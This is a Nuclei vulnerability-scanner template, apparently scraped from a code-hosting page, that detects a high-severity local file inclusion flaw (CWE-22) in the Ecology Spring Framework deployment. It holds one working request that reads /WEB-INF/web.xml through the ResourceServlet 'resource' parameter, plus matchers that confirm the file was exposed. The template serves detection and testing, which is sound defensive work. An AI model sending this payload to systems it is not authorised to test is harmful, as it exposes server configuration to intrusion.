33 lines
933 B
YAML
33 lines
933 B
YAML
id: ecology-springframework-directory-traversal
|
|
|
|
info:
|
|
name: Ecology Springframework - Local File Inclusion
|
|
author: princechaddha
|
|
severity: high
|
|
description: Ecology Springframework is vulnerable to local file inclusion.
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
tags: ecology,springframework,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "<url-pattern>/weaver/"
|
|
part: body
|
|
|
|
# digest: 4a0a004730450220127e6476e045de420a4dd3b89b9d5850ebd014f3a200b2d269f443dee7b0fe45022100eb233dd0b744e6c7c2487d7fe8003fb2e220b59d9dec85cc57ab2a41aa16cc92:922c64590222798bb761d5b6d8e72950
|